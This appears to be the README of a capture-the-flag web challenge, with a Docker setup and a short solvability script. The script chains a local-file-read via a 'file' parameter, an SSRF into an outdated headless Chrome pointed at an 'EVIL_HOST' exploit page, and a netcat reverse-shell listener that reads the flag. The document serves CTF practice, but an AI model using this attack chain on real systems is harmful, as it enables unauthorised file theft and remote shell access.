# Headless Updateless Brainless

> Jack had to spend time with javascript. Now Jack lost his mind! Welp, I mean, he... Lost his head. \
Can you find the magic flag that will solve his dementia?


# Setup

```bash
docker-compose up
# In crontab
*/30 * * * * root bash -c 'cd /headless-updateless-brainless; docker-compose stop; docker-compose rm -f;docker-compose up'
```


# Test solvability

```bash
# File read
RHOST=127.0.0.1
PORT=80
EVIL_HOST=127.0.0.1
EVIL_PORT=8000
curl -ki "http://$RHOST:$PORT/?file=index.html"
curl -ki "http://$RHOST:$PORT/?file=/proc/self/cmdline"
curl -ki "http://$RHOST:$PORT/?file=chall.js"
curl -ki "http://$RHOST:$PORT/coolish-unguessable-feature?url=http://$EVIL_HOST:$EVIL_PORT/exploit.html"
# User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/89.0.4389.72 Safari/537.36

# Then serve the browser exploit on attacker target
python3 -m http.server 8000
# And wait for your reverse shell to cat the file
nc -lnvp 8000
cat /flag_*
```
